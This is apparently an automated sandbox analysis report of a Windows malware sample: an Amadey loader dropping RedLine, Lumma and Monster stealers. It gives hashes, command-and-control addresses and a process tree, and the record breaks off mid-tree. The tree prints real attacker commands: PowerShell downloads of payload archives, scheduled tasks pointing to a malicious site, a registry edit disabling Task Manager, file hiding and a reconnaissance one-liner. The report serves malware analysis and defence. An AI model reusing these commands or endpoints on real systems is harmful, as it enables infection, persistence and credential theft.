Resubmissions

27-06-2024 14:13

240627-rjs77avdmg 10

25-06-2024 23:04

240625-22r3ysyhkh 10

Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-06-2024 23:04

General

  • Target

    f7a0aff5062d764f6b560b51a8078330c3f9177382bf57d94e7c1ea8cd00a454.exe

  • Size

    1.8MB

  • MD5

    381ad58a2d349eb4f1efa241b4f47f3e

  • SHA1

    1561cc54882ced57264cd4357f3fd46039099cf9

  • SHA256

    f7a0aff5062d764f6b560b51a8078330c3f9177382bf57d94e7c1ea8cd00a454

  • SHA512

    9585252cf0491e01902f16a9eef1e4aa5d97926514dd155973f831721e9e4480069a80c961eedb121d7fef739971b6d8ac4b6b60ee7c410b8907782450f86c18

  • SSDEEP

    49152:7EQpE8UYKkO0tSROV2EpBWoiQJzwOF4fmMUV4jC42d:7EPX8tcOAWeKzMpjC48

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.236.127:1110

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 2 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f7a0aff5062d764f6b560b51a8078330c3f9177382bf57d94e7c1ea8cd00a454.exe
    "C:\Users\Admin\AppData\Local\Temp\f7a0aff5062d764f6b560b51a8078330c3f9177382bf57d94e7c1ea8cd00a454.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4148
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4828
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4832
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff741c46f8,0x7fff741c4708,0x7fff741c4718
            5⤵
              PID:3304
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
              5⤵
                PID:3468
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2844
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                5⤵
                  PID:4316
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                  5⤵
                    PID:1956
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                    5⤵
                      PID:3788
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
                      5⤵
                        PID:3612
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5196
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                        5⤵
                          PID:5268
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
                          5⤵
                            PID:5276
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
                            5⤵
                              PID:5496
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
                              5⤵
                                PID:3060
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13940408993978825334,12956154542936205053,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5356 /prefetch:2
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3564
                            • C:\Users\Admin\AppData\Local\Temp\6.exe
                              "C:\Users\Admin\AppData\Local\Temp\6.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5216
                            • C:\Users\Admin\AppData\Local\Temp\7.exe
                              "C:\Users\Admin\AppData\Local\Temp\7.exe"
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5760
                          • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2168
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1632
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2168 -s 288
                              4⤵
                              • Program crash
                              PID:4252
                          • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:2180
                          • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                            3⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • Suspicious use of WriteProcessMemory
                            PID:5076
                            • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                              "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                              4⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4928
                              • C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:4052
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 404
                                  6⤵
                                  • Program crash
                                  PID:3108
                          • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:3792
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd /c ins.bat
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3168
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                5⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:224
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                5⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:1068
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                                5⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4724
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1964
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4048
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1188
                                  • C:\Windows\system32\reg.exe
                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                    7⤵
                                    • Modifies registry key
                                    PID:3760
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3612
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2876
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                                5⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2688
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1068
                              • C:\Windows\system32\schtasks.exe
                                schtasks /query /TN "Cleaner"
                                5⤵
                                  PID:4356
                            • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:2784
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3060
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 260
                                4⤵
                                • Program crash
                                PID:1600
                            • C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1092
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                4⤵
                                  PID:5272
                              • C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:5524
                                • C:\Users\Admin\AppData\Local\Temp\onefile_5524_133638303265569419\stub.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5704
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "ver"
                                    5⤵
                                      PID:5864
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:5924
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:6028
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                        5⤵
                                          PID:5936
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist
                                            6⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6044
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                          5⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:6104
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                            6⤵
                                            • Views/modifies file attributes
                                            PID:4140
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                          5⤵
                                            PID:5040
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                            5⤵
                                              PID:1684
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /IM chrome.exe
                                                6⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4708
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              5⤵
                                                PID:5920
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2168
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                5⤵
                                                  PID:5844
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Get-Clipboard
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5144
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                  5⤵
                                                    PID:5980
                                                    • C:\Windows\system32\chcp.com
                                                      chcp
                                                      6⤵
                                                        PID:3612
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                      5⤵
                                                        PID:5808
                                                        • C:\Windows\system32\chcp.com
                                                          chcp
                                                          6⤵
                                                            PID:6140
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                          5⤵
                                                            PID:5316
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh wlan show profiles
                                                              6⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              PID:5736
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                            5⤵
                                                              PID:5328
                                                              • C:\Windows\system32\systeminfo.exe
                                                                systeminfo
                                                                6⤵
                                                                • Gathers system information
                                                                PID:5236
                                                              • C:\Windows\system32\HOSTNAME.EXE
                                                                hostname
                                                                6⤵
                                                                  PID:5972
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic logicaldisk get caption,description,providername
                                                                  6⤵
                                                                  • Collects information from the system
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5332
                                                                • C:\Windows\system32\net.exe
                                                                  net user
                                                                  6⤵
                                                                    PID:5996
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 user
                                                                      7⤵
                                                                        PID:5324
                                                                    • C:\Windows\system32\query.exe
                                                                      query user
                                                                      6⤵
                                                                        PID:5384
                                                                        • C:\Windows\system32\quser.exe
                                                                          "C:\Windows\system32\quser.exe"
                                                                          7⤵
                                                                            PID:3964
                                                                        • C:\Windows\system32\net.exe
                                                                          net localgroup
                                                                          6⤵
                                                                            PID:2544
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 localgroup
                                                                              7⤵
                                                                                PID:1852
                                                                            • C:\Windows\system32\net.exe
                                                                              net localgroup administrators
                                                                              6⤵
                                                                                PID:3588
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 localgroup administrators
                                                                                  7⤵
                                                                                    PID:216
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user guest
                                                                                  6⤵
                                                                                    PID:5356
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user guest
                                                                                      7⤵
                                                                                        PID:5448
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net user administrator
                                                                                      6⤵
                                                                                        PID:6132
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 user administrator
                                                                                          7⤵
                                                                                            PID:2408
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic startup get caption,command
                                                                                          6⤵
                                                                                            PID:5548
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /svc
                                                                                            6⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:6048
                                                                                          • C:\Windows\system32\ipconfig.exe
                                                                                            ipconfig /all
                                                                                            6⤵
                                                                                            • Gathers network information
                                                                                            PID:6064
                                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                                            route print
                                                                                            6⤵
                                                                                              PID:3208
                                                                                            • C:\Windows\system32\ARP.EXE
                                                                                              arp -a
                                                                                              6⤵
                                                                                                PID:2168
                                                                                              • C:\Windows\system32\NETSTAT.EXE
                                                                                                netstat -ano
                                                                                                6⤵
                                                                                                • Gathers network information
                                                                                                PID:5788
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc query type= service state= all
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                PID:6080
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh firewall show state
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:2404
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh firewall show config
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:5824
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                              5⤵
                                                                                                PID:5732
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic csproduct get uuid
